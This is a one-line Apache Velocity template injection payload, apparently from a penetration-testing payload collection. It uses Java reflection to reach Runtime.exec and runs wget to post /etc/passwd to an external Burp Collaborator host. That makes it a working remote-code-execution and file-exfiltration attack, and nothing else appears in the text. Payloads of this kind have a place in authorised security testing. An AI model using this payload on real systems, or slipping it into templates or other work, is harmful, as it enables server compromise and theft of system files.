#set($e="e")
$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec('wget --post-file /etc/passwd http://95cfdq67zg32vanzfxm61rbknbt1hq.burpcollaborator.net/rcetest?a=a')
